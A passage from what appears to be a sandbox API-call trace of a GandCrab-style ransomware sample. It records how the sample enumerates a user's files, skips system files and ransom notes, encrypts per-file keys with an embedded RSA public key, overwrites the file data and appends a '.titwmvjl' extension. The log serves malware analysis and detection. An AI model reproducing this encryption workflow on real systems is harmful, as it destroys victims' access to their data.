7\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0071.905] WriteFile (in: hFile=0x2cc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259e824, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259e824*=0x2162, lpOverlapped=0x0) returned 1 [0071.906] CloseHandle (hObject=0x2cc) returned 1 [0071.906] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.906] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0071.907] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x11, wMilliseconds=0xd7)) [0071.907] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0071.907] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0071.907] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0071.908] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\d2ca4a09d2ca4deb61a.lock") returned 105 [0071.908] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\document building blocks\\1033\\16\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2cc [0071.910] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.910] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.911] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\") returned 81 [0071.911] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\*" [0071.911] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\*", fInfoLevelId=0x1, lpFindFileData=0x259e840, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259e840) returned 0x503978 [0071.911] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.911] FindNextFileW (in: hFindFile=0x503978, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0071.911] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.912] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.912] FindNextFileW (in: hFindFile=0x503978, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0071.912] lstrcmpW (lpString1="Built-In Building Blocks.dotx", lpString2=".") returned 1 [0071.912] lstrcmpW (lpString1="Built-In Building Blocks.dotx", lpString2="..") returned 1 [0071.912] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\", lpString2="Built-In Building Blocks.dotx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\Built-In Building Blocks.dotx") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\Built-In Building Blocks.dotx" [0071.912] lstrlenW (lpString=".titwmvjl") returned 9 [0071.912] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\Built-In Building Blocks.dotx") returned 110 [0071.912] VirtualAlloc (lpAddress=0x0, dwSize=0x11c, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0071.912] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\Built-In Building Blocks.dotx.titwmvjl") returned 119 [0071.912] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\Built-In Building Blocks.dotx") returned 110 [0071.912] lstrlenW (lpString=".dotx") returned 5 [0071.912] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0071.912] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".dotx ") returned 6 [0071.912] lstrcmpiW (lpString1=".dotx", lpString2=".titwmvjl") returned -1 [0071.912] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.913] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\Built-In Building Blocks.dotx") returned 110 [0071.913] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\Built-In Building Blocks.dotx") returned 110 [0071.913] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="desktop.ini") returned -1 [0071.913] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="autorun.inf") returned 1 [0071.913] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="ntuser.dat") returned -1 [0071.913] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="iconcache.db") returned -1 [0071.913] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="bootsect.bak") returned 1 [0071.913] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="boot.ini") returned 1 [0071.913] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="ntuser.dat.log") returned -1 [0071.913] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="thumbs.db") returned -1 [0071.913] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0071.913] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0071.913] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="KRAB-DECRYPT.html") returned -1 [0071.913] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="CRAB-DECRYPT.html") returned -1 [0071.913] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="KRAB-DECRYPT.txt") returned -1 [0071.913] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="CRAB-DECRYPT.txt") returned -1 [0071.913] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="ntldr") returned -1 [0071.913] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="NTDETECT.COM") returned -1 [0071.913] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="Bootfont.bin") returned 1 [0071.913] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\Built-In Building Blocks.dotx") returned 110 [0071.913] lstrlenW (lpString=".dotx") returned 5 [0071.913] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0071.913] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".dotx ") returned 6 [0071.913] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.913] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0071.914] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\Built-In Building Blocks.dotx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\document building blocks\\1033\\16\\built-in building blocks.dotx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2d4 [0071.915] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0071.915] ReadFile (in: hFile=0x2d4, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259e78c*=0x21c, lpOverlapped=0x0) returned 1 [0071.924] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0071.924] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.924] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4cdb38) returned 1 [0071.925] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0071.925] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0071.925] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0071.925] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259e748 | out: pbBuffer=0x259e748) returned 1 [0071.925] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.926] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0071.926] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.926] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.926] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4cdb38) returned 1 [0071.926] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0071.926] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0071.927] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0071.927] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259e768 | out: pbBuffer=0x259e768) returned 1 [0071.927] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.927] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0071.927] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.927] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.927] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4cdb38) returned 1 [0071.927] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.928] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x5032f8) returned 1 [0071.928] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.928] CryptGetKeyParam (in: hKey=0x5032f8, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0071.928] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.928] CryptEncrypt (in: hKey=0x5032f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0071.928] GetLastError () returned 0x0 [0071.928] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.928] CryptDestroyKey (hKey=0x5032f8) returned 1 [0071.928] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.929] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0071.929] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.929] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4cdb38) returned 1 [0071.929] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.929] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503738) returned 1 [0071.929] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.929] CryptGetKeyParam (in: hKey=0x503738, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0071.930] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.930] CryptEncrypt (in: hKey=0x503738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0071.930] GetLastError () returned 0x0 [0071.930] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.930] CryptDestroyKey (hKey=0x503738) returned 1 [0071.930] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.930] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0071.930] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0071.931] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0071.931] ReadFile (in: hFile=0x2d4, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259e78c*=0x100000, lpOverlapped=0x0) returned 1 [0071.979] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0071.979] WriteFile (in: hFile=0x2d4, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259e770*=0x100000, lpOverlapped=0x0) returned 1 [0072.001] ReadFile (in: hFile=0x2d4, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259e78c*=0x100000, lpOverlapped=0x0) returned 1 [0072.022] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.022] WriteFile (in: hFile=0x2d4, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259e770*=0x100000, lpOverlapped=0x0) returned 1 [0072.029] ReadFile (in: hFile=0x2d4, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259e78c*=0x100000, lpOverlapped=0x0) returned 1 [0072.042] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.042] WriteFile (in: hFile=0x2d4, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259e770*=0x100000, lpOverlapped=0x0) returned 1 [0072.048] ReadFile (in: hFile=0x2d4, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259e78c*=0x88cc7, lpOverlapped=0x0) returned 1 [0072.058] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfff77339, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.058] WriteFile (in: hFile=0x2d4, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x88cc7, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259e770*=0x88cc7, lpOverlapped=0x0) returned 1 [0072.062] WriteFile (in: hFile=0x2d4, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259e770*=0x21c, lpOverlapped=0x0) returned 1 [0072.063] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.068] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.072] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.072] CloseHandle (hObject=0x2d4) returned 1 [0072.165] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\Built-In Building Blocks.dotx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\document building blocks\\1033\\16\\built-in building blocks.dotx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\Built-In Building Blocks.dotx.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\document building blocks\\1033\\16\\built-in building blocks.dotx.titwmvjl"), dwFlags=0x1) returned 1 [0072.165] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.165] FindNextFileW (in: hFindFile=0x503978, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0072.165] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0072.166] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0072.166] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\d2ca4a09d2ca4deb61a.lock" [0072.166] lstrlenW (lpString=".titwmvjl") returned 9 [0072.166] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\d2ca4a09d2ca4deb61a.lock") returned 105 [0072.166] VirtualAlloc (lpAddress=0x0, dwSize=0x112, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.166] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 114 [0072.166] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\d2ca4a09d2ca4deb61a.lock") returned 105 [0072.166] lstrlenW (lpString=".lock") returned 5 [0072.166] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.166] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0072.166] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.167] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.167] FindNextFileW (in: hFindFile=0x503978, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0072.167] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0072.167] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0072.167] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\TITWMVJL-DECRYPT.txt" [0072.167] lstrlenW (lpString=".titwmvjl") returned 9 [0072.167] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\TITWMVJL-DECRYPT.txt") returned 101 [0072.167] VirtualAlloc (lpAddress=0x0, dwSize=0x10a, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.167] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 110 [0072.167] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\TITWMVJL-DECRYPT.txt") returned 101 [0072.167] lstrlenW (lpString=".txt") returned 4 [0072.167] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.167] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0072.167] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0072.168] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.168] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\TITWMVJL-DECRYPT.txt") returned 101 [0072.168] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\TITWMVJL-DECRYPT.txt") returned 101 [0072.168] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0072.168] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0072.168] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0072.168] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0072.168] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0072.168] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0072.168] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0072.168] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0072.168] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.168] FindNextFileW (in: hFindFile=0x503978, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 0 [0072.168] FindClose (in: hFindFile=0x503978 | out: hFindFile=0x503978) returned 1 [0072.169] CloseHandle (hObject=0x2cc) returned 1 [0072.169] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0072.169] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0072.169] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0072.169] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\d2ca4a09d2ca4deb61a.lock" [0072.169] lstrlenW (lpString=".titwmvjl") returned 9 [0072.170] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\d2ca4a09d2ca4deb61a.lock") returned 102 [0072.170] VirtualAlloc (lpAddress=0x0, dwSize=0x10c, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.170] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 111 [0072.170] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\d2ca4a09d2ca4deb61a.lock") returned 102 [0072.170] lstrlenW (lpString=".lock") returned 5 [0072.170] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.170] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0072.170] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.170] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.170] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259ead4 | out: 